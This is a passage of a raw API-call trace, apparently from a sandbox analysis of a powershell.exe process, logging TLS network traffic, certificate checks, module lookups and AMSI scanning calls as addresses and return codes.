buf=0x1e339689bb8*)), dwBufferCount=0x1, lpNumberOfBytesSent=0xb15647e720, dwFlags=0x0, lpOverlapped=0x1e33903b1c0, lpCompletionRoutine=0x0 | out: lpNumberOfBytesSent=0xb15647e720*=0xa7, lpOverlapped=0x1e33903b1c0) returned 0 [0150.973] WSARecv (in: s=0x894, lpBuffers=0x1e3396a0ca0, dwBufferCount=0x1, lpNumberOfBytesRecvd=0xb15647eaf0, lpFlags=0xb15647eb50*=0x0, lpOverlapped=0x1e33903b150, lpCompletionRoutine=0x0 | out: lpBuffers=0x1e3396a0ca0*=((len=0x5, buf=0x1e339697a50*)), lpNumberOfBytesRecvd=0xb15647eaf0*=0x0, lpFlags=0xb15647eb50*=0x0, lpOverlapped=0x1e33903b150) returned 0 [0150.984] WSARecv (in: s=0x894, lpBuffers=0x1e3396a0f38, dwBufferCount=0x1, lpNumberOfBytesRecvd=0xb15647ee40, lpFlags=0xb15647eea0*=0x0, lpOverlapped=0x1e33903b150, lpCompletionRoutine=0x0 | out: lpBuffers=0x1e3396a0f38*=((len=0x571, buf=0x1e339697a55*)), lpNumberOfBytesRecvd=0xb15647ee40*=0x571, lpFlags=0xb15647eea0*=0x0, lpOverlapped=0x1e33903b150) returned 0 [0150.984] DecryptMessage (in: phContext=0x1e33967be68, pMessage=0x1e3396a1230, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x1e3396a1230, pfQOP=0x0) returned 0x0 [0150.985] SetEvent (hEvent=0x8dc) returned 1 [0150.992] SetEvent (hEvent=0x874) returned 1 [0156.317] WSAEnumNetworkEvents (in: s=0x898, hEventObject=0x8b4, lpNetworkEvents=0xb15647f2d0 | out: lpNetworkEvents=0xb15647f2d0) returned 0 [0156.317] WSAEventSelect (s=0x898, hEventObject=0x0, lNetworkEvents=0) returned 0 [0156.317] ResetEvent (hEvent=0x8b4) returned 1 [0156.317] ioctlsocket (in: s=0x898, cmd=-2147195266, argp=0xb15647f300 | out: argp=0xb15647f300) returned 0 [0156.317] closesocket (s=0x730) returned 0 [0156.318] InitializeSecurityContextW (in: phCredential=0xb15647e7c8, phContext=0x0, pTargetName=0x1e3394bb0a4, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x0, Reserved2=0x0, phNewContext=0x1e3394bbff0, pOutput=0x1e3394bbf48, pfContextAttr=0x1e3394bbc08, ptsExpiry=0xb15647e7c0 | out: phNewContext=0x1e3394bbff0, pOutput=0x1e3394bbf48, pfContextAttr=0x1e3394bbc08, ptsExpiry=0xb15647e7c0) returned 0x90312 [0156.319] FreeContextBuffer (in: pvContextBuffer=0x1e35142ac40 | out: pvContextBuffer=0x1e35142ac40) returned 0x0 [0156.319] WSASend (in: s=0x898, lpBuffers=0x1e3394bc190*=((len=0xb0, buf=0x1e3394bc018*)), dwBufferCount=0x1, lpNumberOfBytesSent=0xb15647ea00, dwFlags=0x0, lpOverlapped=0x1e33903b0e0, lpCompletionRoutine=0x0 | out: lpNumberOfBytesSent=0xb15647ea00*=0xb0, lpOverlapped=0x1e33903b0e0) returned 0 [0156.320] WSARecv (in: s=0x898, lpBuffers=0x1e3394bc678, dwBufferCount=0x1, lpNumberOfBytesRecvd=0xb15647ef00, lpFlags=0xb15647ef60*=0x0, lpOverlapped=0x1e3394bcea8, lpCompletionRoutine=0x0 | out: lpBuffers=0x1e3394bc678*=((len=0x5, buf=0x1e3394bc018*)), lpNumberOfBytesRecvd=0xb15647ef00*=0x0, lpFlags=0xb15647ef60*=0x0, lpOverlapped=0x1e3394bcea8) returned 0 [0156.334] WSARecv (in: s=0x898, lpBuffers=0x1e3394bd348, dwBufferCount=0x1, lpNumberOfBytesRecvd=0xb15647ee50, lpFlags=0xb15647eeb0*=0x0, lpOverlapped=0x1e3394bcea8, lpCompletionRoutine=0x0 | out: lpBuffers=0x1e3394bd348*=((len=0x61, buf=0x1e3394bc01d*)), lpNumberOfBytesRecvd=0xb15647ee50*=0x61, lpFlags=0xb15647eeb0*=0x0, lpOverlapped=0x1e3394bcea8) returned 0 [0156.335] InitializeSecurityContextW (in: phCredential=0xb15647ec18, phContext=0xb15647ed40, pTargetName=0x1e3394bb0a4, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x1e3394bd600, Reserved2=0x0, phNewContext=0x1e3394bbff0, pOutput=0x1e3394bd620, pfContextAttr=0x1e3394bbc08, ptsExpiry=0xb15647ec10 | out: phNewContext=0x1e3394bbff0, pOutput=0x1e3394bd620, pfContextAttr=0x1e3394bbc08, ptsExpiry=0xb15647ec10) returned 0x90312 [0156.336] WSARecv (in: s=0x898, lpBuffers=0x1e3394bd7c0, dwBufferCount=0x1, lpNumberOfBytesRecvd=0xb15647ee00, lpFlags=0xb15647ee60*=0x0, lpOverlapped=0x1e3394bcea8, lpCompletionRoutine=0x0 | out: lpBuffers=0x1e3394bd7c0*=((len=0x5, buf=0x1e3394bd710*)), lpNumberOfBytesRecvd=0xb15647ee00*=0x5, lpFlags=0xb15647ee60*=0x0, lpOverlapped=0x1e3394bcea8) returned 0 [0156.336] WSARecv (in: s=0x898, lpBuffers=0x1e3394be448, dwBufferCount=0x1, lpNumberOfBytesRecvd=0xb15647ee50, lpFlags=0xb15647eeb0*=0x0, lpOverlapped=0x1e3394bcea8, lpCompletionRoutine=0x0 | out: lpBuffers=0x1e3394be448*=((len=0x968, buf=0x1e3394bda35*)), lpNumberOfBytesRecvd=0xb15647ee50*=0x968, lpFlags=0xb15647eeb0*=0x0, lpOverlapped=0x1e3394bcea8) returned 0 [0156.336] InitializeSecurityContextW (in: phCredential=0xb15647ec18, phContext=0xb15647ed40, pTargetName=0x1e3394bb0a4, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x1e3394be768, Reserved2=0x0, phNewContext=0x1e3394bbff0, pOutput=0x1e3394be788, pfContextAttr=0x1e3394bbc08, ptsExpiry=0xb15647ec10 | out: phNewContext=0x1e3394bbff0, pOutput=0x1e3394be788, pfContextAttr=0x1e3394bbc08, ptsExpiry=0xb15647ec10) returned 0x90312 [0156.338] WSARecv (in: s=0x898, lpBuffers=0x1e3394be928, dwBufferCount=0x1, lpNumberOfBytesRecvd=0xb15647ee00, lpFlags=0xb15647ee60*=0x0, lpOverlapped=0x1e3394bcea8, lpCompletionRoutine=0x0 | out: lpBuffers=0x1e3394be928*=((len=0x5, buf=0x1e3394be878*)), lpNumberOfBytesRecvd=0xb15647ee00*=0x5, lpFlags=0xb15647ee60*=0x0, lpOverlapped=0x1e3394bcea8) returned 0 [0156.338] WSARecv (in: s=0x898, lpBuffers=0x1e3394bece0, dwBufferCount=0x1, lpNumberOfBytesRecvd=0xb15647ee50, lpFlags=0xb15647eeb0*=0x0, lpOverlapped=0x1e3394bcea8, lpCompletionRoutine=0x0 | out: lpBuffers=0x1e3394bece0*=((len=0x95, buf=0x1e3394beb9d*)), lpNumberOfBytesRecvd=0xb15647ee50*=0x95, lpFlags=0xb15647eeb0*=0x0, lpOverlapped=0x1e3394bcea8) returned 0 [0156.339] InitializeSecurityContextW (in: phCredential=0xb15647ec18, phContext=0xb15647ed40, pTargetName=0x1e3394bb0a4, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x1e3394bf000, Reserved2=0x0, phNewContext=0x1e3394bbff0, pOutput=0x1e3394bf020, pfContextAttr=0x1e3394bbc08, ptsExpiry=0xb15647ec10 | out: phNewContext=0x1e3394bbff0, pOutput=0x1e3394bf020, pfContextAttr=0x1e3394bbc08, ptsExpiry=0xb15647ec10) returned 0x90312 [0156.339] WSARecv (in: s=0x898, lpBuffers=0x1e3394bf1c0, dwBufferCount=0x1, lpNumberOfBytesRecvd=0xb15647ee00, lpFlags=0xb15647ee60*=0x0, lpOverlapped=0x1e3394bcea8, lpCompletionRoutine=0x0 | out: lpBuffers=0x1e3394bf1c0*=((len=0x5, buf=0x1e3394bf110*)), lpNumberOfBytesRecvd=0xb15647ee00*=0x5, lpFlags=0xb15647ee60*=0x0, lpOverlapped=0x1e3394bcea8) returned 0 [0156.340] WSARecv (in: s=0x898, lpBuffers=0x1e3394bf4e8, dwBufferCount=0x1, lpNumberOfBytesRecvd=0xb15647ee50, lpFlags=0xb15647eeb0*=0x0, lpOverlapped=0x1e3394bcea8, lpCompletionRoutine=0x0 | out: lpBuffers=0x1e3394bf4e8*=((len=0x4, buf=0x1e3394bf435*)), lpNumberOfBytesRecvd=0xb15647ee50*=0x4, lpFlags=0xb15647eeb0*=0x0, lpOverlapped=0x1e3394bcea8) returned 0 [0156.340] InitializeSecurityContextW (in: phCredential=0xb15647ec18, phContext=0xb15647ed40, pTargetName=0x1e3394bb0a4, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x1e3394bf808, Reserved2=0x0, phNewContext=0x1e3394bbff0, pOutput=0x1e3394bf828, pfContextAttr=0x1e3394bbc08, ptsExpiry=0xb15647ec10 | out: phNewContext=0x1e3394bbff0, pOutput=0x1e3394bf828, pfContextAttr=0x1e3394bbc08, ptsExpiry=0xb15647ec10) returned 0x90312 [0156.552] FreeContextBuffer (in: pvContextBuffer=0x1e35141f770 | out: pvContextBuffer=0x1e35141f770) returned 0x0 [0156.552] WSASend (in: s=0x898, lpBuffers=0x1e3394bfa40*=((len=0x7e, buf=0x1e3394bf8f8*)), dwBufferCount=0x1, lpNumberOfBytesSent=0xb15647ee40, dwFlags=0x0, lpOverlapped=0x1e33903b0e0, lpCompletionRoutine=0x0 | out: lpNumberOfBytesSent=0xb15647ee40*=0x7e, lpOverlapped=0x1e33903b0e0) returned 0 [0156.553] WSARecv (in: s=0x898, lpBuffers=0x1e3394bfd60, dwBufferCount=0x1, lpNumberOfBytesRecvd=0xb15647ef00, lpFlags=0xb15647ef60*=0x0, lpOverlapped=0x1e3394bcea8, lpCompletionRoutine=0x0 | out: lpBuffers=0x1e3394bfd60*=((len=0x5, buf=0x1e3394bf8f8*)), lpNumberOfBytesRecvd=0xb15647ef00*=0x0, lpFlags=0xb15647ef60*=0x0, lpOverlapped=0x1e3394bcea8) returned 0 [0156.569] WSARecv (in: s=0x898, lpBuffers=0x1e3394c0060, dwBufferCount=0x1, lpNumberOfBytesRecvd=0xb15647ee50, lpFlags=0xb15647eeb0*=0x0, lpOverlapped=0x1e3394bcea8, lpCompletionRoutine=0x0 | out: lpBuffers=0x1e3394c0060*=((len=0x1, buf=0x1e3394bf8fd*)), lpNumberOfBytesRecvd=0xb15647ee50*=0x1, lpFlags=0xb15647eeb0*=0x0, lpOverlapped=0x1e3394bcea8) returned 0 [0156.569] InitializeSecurityContextW (in: phCredential=0xb15647ec18, phContext=0xb15647ed40, pTargetName=0x1e3394bb0a4, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x1e3394c0318, Reserved2=0x0, phNewContext=0x1e3394bbff0, pOutput=0x1e3394c0338, pfContextAttr=0x1e3394bbc08, ptsExpiry=0xb15647ec10 | out: phNewContext=0x1e3394bbff0, pOutput=0x1e3394c0338, pfContextAttr=0x1e3394bbc08, ptsExpiry=0xb15647ec10) returned 0x90312 [0156.570] WSARecv (in: s=0x898, lpBuffers=0x1e3394c04d8, dwBufferCount=0x1, lpNumberOfBytesRecvd=0xb15647ee00, lpFlags=0xb15647ee60*=0x0, lpOverlapped=0x1e3394bcea8, lpCompletionRoutine=0x0 | out: lpBuffers=0x1e3394c04d8*=((len=0x5, buf=0x1e3394c0428*)), lpNumberOfBytesRecvd=0xb15647ee00*=0x5, lpFlags=0xb15647ee60*=0x0, lpOverlapped=0x1e3394bcea8) returned 0 [0156.570] WSARecv (in: s=0x898, lpBuffers=0x1e3394c0820, dwBufferCount=0x1, lpNumberOfBytesRecvd=0xb15647ee50, lpFlags=0xb15647eeb0*=0x0, lpOverlapped=0x1e3394bcea8, lpCompletionRoutine=0x0 | out: lpBuffers=0x1e3394c0820*=((len=0x28, buf=0x1e3394c074d*)), lpNumberOfBytesRecvd=0xb15647ee50*=0x28, lpFlags=0xb15647eeb0*=0x0, lpOverlapped=0x1e3394bcea8) returned 0 [0156.571] InitializeSecurityContextW (in: phCredential=0xb15647ec18, phContext=0xb15647ed40, pTargetName=0x1e3394bb0a4, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x1e3394c0b40, Reserved2=0x0, phNewContext=0x1e3394bbff0, pOutput=0x1e3394c0b60, pfContextAttr=0x1e3394bbc08, ptsExpiry=0xb15647ec10 | out: phNewContext=0x1e3394bbff0, pOutput=0x1e3394c0b60, pfContextAttr=0x1e3394bbc08, ptsExpiry=0xb15647ec10) returned 0x0 [0156.572] QueryContextAttributesW (in: phContext=0x1e3394bbff0, ulAttribute=0x4, pBuffer=0x1e3394c0c50 | out: pBuffer=0x1e3394c0c50) returned 0x0 [0156.573] QueryContextAttributesW (in: phContext=0x1e3394bbff0, ulAttribute=0x5a, pBuffer=0x1e3394c0ca8 | out: pBuffer=0x1e3394c0ca8) returned 0x0 [0156.573] QueryContextAttributesW (in: phContext=0x1e3394bbff0, ulAttribute=0x53, pBuffer=0x1e3394c0d10 | out: pBuffer=0x1e3394c0d10) returned 0x0 [0156.573] CertDuplicateCertificateContext (pCertContext=0x1e3513eef20) returned 0x1e3513eef20 [0156.573] CertDuplicateStore (hCertStore=0x1e35142ac40) returned 0x1e35142ac40 [0156.573] CertEnumCertificatesInStore (hCertStore=0x1e35142ac40, pPrevCertContext=0x0) returned 0x1e3513eeda0 [0156.573] CertDuplicateCertificateContext (pCertContext=0x1e3513eeda0) returned 0x1e3513eeda0 [0156.573] CertEnumCertificatesInStore (hCertStore=0x1e35142ac40, pPrevCertContext=0x1e3513eeda0) returned 0x1e3513eef20 [0156.574] CertDuplicateCertificateContext (pCertContext=0x1e3513eef20) returned 0x1e3513eef20 [0156.574] CertEnumCertificatesInStore (hCertStore=0x1e35142ac40, pPrevCertContext=0x1e3513eef20) returned 0x0 [0156.574] CertCloseStore (hCertStore=0x1e35142ac40, dwFlags=0x0) returned 1 [0156.574] CertFreeCertificateContext (pCertContext=0x1e3513eef20) returned 1 [0156.576] CertOpenStore (lpszStoreProvider=0x2, dwEncodingType=0x10001, hCryptProv=0x0, dwFlags=0x2204, pvPara=0x0) returned 0x1e35142ad10 [0156.576] CertAddCRLLinkToStore (in: hCertStore=0x1e35142ad10, pCrlContext=0x1e3513eeda0, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1 [0156.576] CertAddCRLLinkToStore (in: hCertStore=0x1e35142ad10, pCrlContext=0x1e3513eef20, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1 [0156.577] CertGetCertificateChain (in: hChainEngine=0x0, pCertContext=0x1e3513eef20, pTime=0xb15647ed30, hAdditionalStore=0x1e35142ad10, pChainPara=0xb15647ebc8, dwFlags=0x0, pvReserved=0x0, ppChainContext=0xb15647ebb0 | out: ppChainContext=0xb15647ebb0) returned 1 [0156.578] CertDuplicateCertificateChain (pChainContext=0x1e3513f2940) returned 0x1e3513f2940 [0156.578] CertDuplicateCertificateContext (pCertContext=0x1e3513eef20) returned 0x1e3513eef20 [0156.579] CertDuplicateCertificateContext (pCertContext=0x1e3513ef6a0) returned 0x1e3513ef6a0 [0156.579] CertDuplicateCertificateContext (pCertContext=0x1e3513ef0a0) returned 0x1e3513ef0a0 [0156.579] CertFreeCertificateChain (pChainContext=0x1e3513f2940) [0156.579] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x1, pChainContext=0x1e3513f2940, pPolicyPara=0xb15647ee78, pPolicyStatus=0xb15647ee58 | out: pPolicyStatus=0xb15647ee58) returned 1 [0156.579] SetLastError (dwErrCode=0x0) [0156.579] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x4, pChainContext=0x1e3513f2940, pPolicyPara=0xb15647ef58, pPolicyStatus=0xb15647eea8 | out: pPolicyStatus=0xb15647eea8) returned 1 [0156.579] CertFreeCertificateChain (pChainContext=0x1e3513f2940) [0156.579] CertFreeCertificateContext (pCertContext=0x1e3513eef20) returned 1 [0156.580] EncryptMessage (in: phContext=0x1e3394bbff0, fQOP=0x0, pMessage=0x1e3394c2ac8, MessageSeqNo=0x0 | out: pMessage=0x1e3394c2ac8) returned 0x0 [0156.580] WSASend (in: s=0x898, lpBuffers=0x1e3394c2c48*=((len=0x144, buf=0x1e3393b5bc8*)), dwBufferCount=0x1, lpNumberOfBytesSent=0xb15647eaf0, dwFlags=0x0, lpOverlapped=0x1e33903b0e0, lpCompletionRoutine=0x0 | out: lpNumberOfBytesSent=0xb15647eaf0*=0x144, lpOverlapped=0x1e33903b0e0) returned 0 [0156.581] WSARecv (in: s=0x898, lpBuffers=0x1e3394c3210, dwBufferCount=0x1, lpNumberOfBytesRecvd=0xb15647e9e0, lpFlags=0xb15647ea40*=0x0, lpOverlapped=0x1e3394bcea8, lpCompletionRoutine=0x0 | out: lpBuffers=0x1e3394c3210*=((len=0x5, buf=0x1e3393bf4d0*)), lpNumberOfBytesRecvd=0xb15647e9e0*=0x0, lpFlags=0xb15647ea40*=0x0, lpOverlapped=0x1e3394bcea8) returned 0 [0156.609] WSARecv (in: s=0x898, lpBuffers=0x1e3394c3510, dwBufferCount=0x1, lpNumberOfBytesRecvd=0xb15647ee40, lpFlags=0xb15647eea0*=0x0, lpOverlapped=0x1e3394bcea8, lpCompletionRoutine=0x0 | out: lpBuffers=0x1e3394c3510*=((len=0x10b5, buf=0x1e3393bf4d5*)), lpNumberOfBytesRecvd=0xb15647ee40*=0x10b5, lpFlags=0xb15647eea0*=0x0, lpOverlapped=0x1e3394bcea8) returned 0 [0156.609] DecryptMessage (in: phContext=0x1e3394bbff0, pMessage=0x1e3394c3808, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x1e3394c3808, pfQOP=0x0) returned 0x0 [0156.635] SetEvent (hEvent=0x788) returned 1 [0156.636] SetEvent (hEvent=0x784) returned 1 Thread: id = 14 os_tid = 0x13c4 Thread: id = 15 os_tid = 0x9d8 Thread: id = 16 os_tid = 0x13f8 Thread: id = 17 os_tid = 0x1214 [0138.502] SetThreadUILanguage (LangId=0x0) returned 0x409 [0138.562] CoCreateGuid (in: pguid=0xb156f8e978 | out: pguid=0xb156f8e978*(Data1=0xbff53221, Data2=0xda83, Data3=0x4fb5, Data4=([0]=0x90, [1]=0x26, [2]=0xc5, [3]=0xd2, [4]=0x69, [5]=0x1a, [6]=0x56, [7]=0x2a))) returned 0x0 [0138.603] GetCurrentProcessId () returned 0x12c4 [0138.603] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x12c4) returned 0x678 [0138.603] EnumProcessModules (in: hProcess=0x678, lphModule=0x1e339241c98, cb=0x200, lpcbNeeded=0xb156f8e760 | out: lphModule=0x1e339241c98, lpcbNeeded=0xb156f8e760) returned 1 [0138.604] EnumProcessModules (in: hProcess=0x678, lphModule=0x1e339241eb0, cb=0x400, lpcbNeeded=0xb156f8e760 | out: lphModule=0x1e339241eb0, lpcbNeeded=0xb156f8e760) returned 1 [0138.606] GetModuleInformation (in: hProcess=0x678, hModule=0x7ff6cf2d0000, lpmodinfo=0x1e339242320, cb=0x18 | out: lpmodinfo=0x1e339242320*(lpBaseOfDll=0x7ff6cf2d0000, SizeOfImage=0x78000, EntryPoint=0x7ff6cf2d31a0)) returned 1 [0138.606] CoTaskMemAlloc (cb=0x804) returned 0x1e351145d80 [0138.606] GetModuleBaseNameW (in: hProcess=0x678, hModule=0x7ff6cf2d0000, lpBaseName=0x1e351145d80, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe [0138.606] CoTaskMemFree (pv=0x1e351145d80) [0138.606] CoTaskMemAlloc (cb=0x804) returned 0x1e3513a5940 [0138.606] GetModuleFileNameExW (in: hProcess=0x678, hModule=0x7ff6cf2d0000, lpFilename=0x1e3513a5940, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39 [0138.606] CoTaskMemFree (pv=0x1e3513a5940) [0138.606] CloseHandle (hObject=0x678) returned 1 [0138.606] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x12c4) returned 0x678 [0138.607] EnumProcessModules (in: hProcess=0x678, lphModule=0x1e339244588, cb=0x200, lpcbNeeded=0xb156f8e760 | out: lphModule=0x1e339244588, lpcbNeeded=0xb156f8e760) returned 1 [0138.608] EnumProcessModules (in: hProcess=0x678, lphModule=0x1e3392447a0, cb=0x400, lpcbNeeded=0xb156f8e760 | out: lphModule=0x1e3392447a0, lpcbNeeded=0xb156f8e760) returned 1 [0138.609] GetModuleInformation (in: hProcess=0x678, hModule=0x7ff6cf2d0000, lpmodinfo=0x1e339244c10, cb=0x18 | out: lpmodinfo=0x1e339244c10*(lpBaseOfDll=0x7ff6cf2d0000, SizeOfImage=0x78000, EntryPoint=0x7ff6cf2d31a0)) returned 1 [0138.609] CoTaskMemAlloc (cb=0x804) returned 0x1e3513a08a0 [0138.609] GetModuleBaseNameW (in: hProcess=0x678, hModule=0x7ff6cf2d0000, lpBaseName=0x1e3513a08a0, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe [0138.609] CoTaskMemFree (pv=0x1e3513a08a0) [0138.609] CoTaskMemAlloc (cb=0x804) returned 0x1e3513a5940 [0138.610] GetModuleFileNameExW (in: hProcess=0x678, hModule=0x7ff6cf2d0000, lpFilename=0x1e3513a5940, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39 [0138.610] CoTaskMemFree (pv=0x1e3513a5940) [0138.610] CloseHandle (hObject=0x678) returned 1 [0138.612] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0xb156f8e210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39 [0138.612] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8e660) returned 1 [0138.612] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0xb156f8e740 | out: lpFileInformation=0xb156f8e740*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f2c94e9, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f2c94e9, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f2c94e9, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x74a00)) returned 1 [0138.613] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8e620) returned 1 [0138.613] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpdwHandle=0xb156f8e818 | out: lpdwHandle=0xb156f8e818) returned 0x73c [0138.613] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwHandle=0x0, dwLen=0x73c, lpData=0x1e339246f90 | out: lpData=0x1e339246f90) returned 1 [0138.613] VerQueryValueW (in: pBlock=0x1e339246f90, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xb156f8e798, puLen=0xb156f8e790 | out: lplpBuffer=0xb156f8e798*=0x1e339247328, puLen=0xb156f8e790) returned 1 [0138.613] VerQueryValueW (in: pBlock=0x1e339246f90, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\CompanyName", lplpBuffer=0xb156f8e738, puLen=0xb156f8e730 | out: lplpBuffer=0xb156f8e738*=0x1e339247048, puLen=0xb156f8e730) returned 1 [0138.613] VerQueryValueW (in: pBlock=0x1e339246f90, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\FileDescription", lplpBuffer=0xb156f8e738, puLen=0xb156f8e730 | out: lplpBuffer=0xb156f8e738*=0x1e33924709c, puLen=0xb156f8e730) returned 1 [0138.613] VerQueryValueW (in: pBlock=0x1e339246f90, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\FileVersion", lplpBuffer=0xb156f8e738, puLen=0xb156f8e730 | out: lplpBuffer=0xb156f8e738*=0x1e3392470e4, puLen=0xb156f8e730) returned 1 [0138.613] VerQueryValueW (in: pBlock=0x1e339246f90, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\InternalName", lplpBuffer=0xb156f8e738, puLen=0xb156f8e730 | out: lplpBuffer=0xb156f8e738*=0x1e339247154, puLen=0xb156f8e730) returned 1 [0138.613] VerQueryValueW (in: pBlock=0x1e339246f90, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\LegalCopyright", lplpBuffer=0xb156f8e738, puLen=0xb156f8e730 | out: lplpBuffer=0xb156f8e738*=0x1e339247190, puLen=0xb156f8e730) returned 1 [0138.613] VerQueryValueW (in: pBlock=0x1e339246f90, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\OriginalFilename", lplpBuffer=0xb156f8e738, puLen=0xb156f8e730 | out: lplpBuffer=0xb156f8e738*=0x1e339247214, puLen=0xb156f8e730) returned 1 [0138.613] VerQueryValueW (in: pBlock=0x1e339246f90, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\ProductName", lplpBuffer=0xb156f8e738, puLen=0xb156f8e730 | out: lplpBuffer=0xb156f8e738*=0x1e33924725c, puLen=0xb156f8e730) returned 1 [0138.614] VerQueryValueW (in: pBlock=0x1e339246f90, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\ProductVersion", lplpBuffer=0xb156f8e738, puLen=0xb156f8e730 | out: lplpBuffer=0xb156f8e738*=0x1e3392472cc, puLen=0xb156f8e730) returned 1 [0138.614] VerQueryValueW (in: pBlock=0x1e339246f90, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\Comments", lplpBuffer=0xb156f8e738, puLen=0xb156f8e730 | out: lplpBuffer=0xb156f8e738*=0x0, puLen=0xb156f8e730) returned 0 [0138.614] VerQueryValueW (in: pBlock=0x1e339246f90, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\LegalTrademarks", lplpBuffer=0xb156f8e738, puLen=0xb156f8e730 | out: lplpBuffer=0xb156f8e738*=0x0, puLen=0xb156f8e730) returned 0 [0138.614] VerQueryValueW (in: pBlock=0x1e339246f90, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\PrivateBuild", lplpBuffer=0xb156f8e738, puLen=0xb156f8e730 | out: lplpBuffer=0xb156f8e738*=0x0, puLen=0xb156f8e730) returned 0 [0138.614] VerQueryValueW (in: pBlock=0x1e339246f90, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\SpecialBuild", lplpBuffer=0xb156f8e738, puLen=0xb156f8e730 | out: lplpBuffer=0xb156f8e738*=0x0, puLen=0xb156f8e730) returned 0 [0138.614] VerQueryValueW (in: pBlock=0x1e339246f90, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xb156f8e6e8, puLen=0xb156f8e6e0 | out: lplpBuffer=0xb156f8e6e8*=0x1e339247328, puLen=0xb156f8e6e0) returned 1 [0138.614] VerLanguageNameW (in: wLang=0x409, szLang=0xb156f8e410, cchLang=0x100 | out: szLang="English (United States)") returned 0x17 [0138.616] VerQueryValueW (in: pBlock=0x1e339246f90, lpSubBlock="\\", lplpBuffer=0xb156f8e738, puLen=0xb156f8e730 | out: lplpBuffer=0xb156f8e738*=0x1e339246fb8, puLen=0xb156f8e730) returned 1 [0138.632] AmsiInitialize () returned 0x0 [0138.644] AmsiOpenSession () returned 0x0 [0138.644] AmsiScanString () returned 0x80070015 [0138.733] EtwEventRegister () returned 0x0 [0138.734] EtwEventSetInformation () returned 0x0 [0138.744] RoGetParameterizedTypeInstanceIID () returned 0x0 [0138.744] Ro::detail::SimpleMetaDataBuilder::SetParameterizedInterface () returned 0x0 [0138.744] Ro::detail::SimpleMetaDataBuilder::SetParameterizedInterface () returned 0x0 [0138.762] WindowsCreateStringReference () returned 0x0 [0138.762] RoGetActivationFactory () returned 0x0 [0138.764] QueryInterface () returned 0x0 [0138.764] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::QueryInterface () returned 0x80004002 [0138.764] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::QueryInterface () returned 0x80004002 [0138.764] QueryInterface () returned 0x0 [0138.764] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::GetRuntimeClassName () returned 0x8000000e [0138.764] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::Release () returned 0x3 [0138.765] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::AddRef () returned 0x4 [0138.765] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::QueryInterface () returned 0x80004002 [0138.765] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::QueryInterface () returned 0x0 [0138.765] Release () returned 0x4 [0138.765] CoGetContextToken (in: pToken=0xb156f8c3d0 | out: pToken=0xb156f8c3d0) returned 0x0 [0138.765] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::QueryInterface () returned 0x80004002 [0138.765] CoGetContextToken (in: pToken=0xb156f8c620 | out: pToken=0xb156f8c620) returned 0x0 [0138.765] 